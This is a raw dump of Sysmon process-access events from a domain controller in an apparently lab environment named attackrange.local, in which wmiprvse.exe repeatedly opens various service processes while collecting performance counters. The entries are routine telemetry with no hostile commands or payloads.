13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.517{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.502{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a7|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2172a|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 